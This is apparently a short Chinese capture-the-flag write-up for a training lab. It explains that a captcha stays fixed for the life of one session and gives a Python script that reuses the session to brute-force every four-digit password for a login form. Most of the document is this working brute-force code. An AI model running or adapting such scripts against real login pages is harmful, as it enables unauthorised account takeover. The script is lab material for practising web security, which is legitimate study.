解决本题的关键是维护同一个账号的会话(session),这样验证码就可以确定下来。
先获取到验证码的地址(在r1.text中),手动输入验证码vode,再进行密码爆破
#coding=utf-8
from http import cookies
import requests;
from lxml import etree #解析html页面的包
if __name__ == "__main__":
url = "http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/index.php"
s = requests.session()
r1 = s.get(url)
print(r1.text)
vcode = input()
url2 = "http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php"
for i in range(1000, 10000):
res = s.post(url = url2, data={
'username': 'amdin',
'pwd': i,
'vcode':vcode,
'submit':'submit'
})
res.encoding = res.apparent_encoding #解决中文乱码
if res.text.find("pwd error") == -1: #密码没有错误即找不到错误提示信息的字符串
print(res.text)
break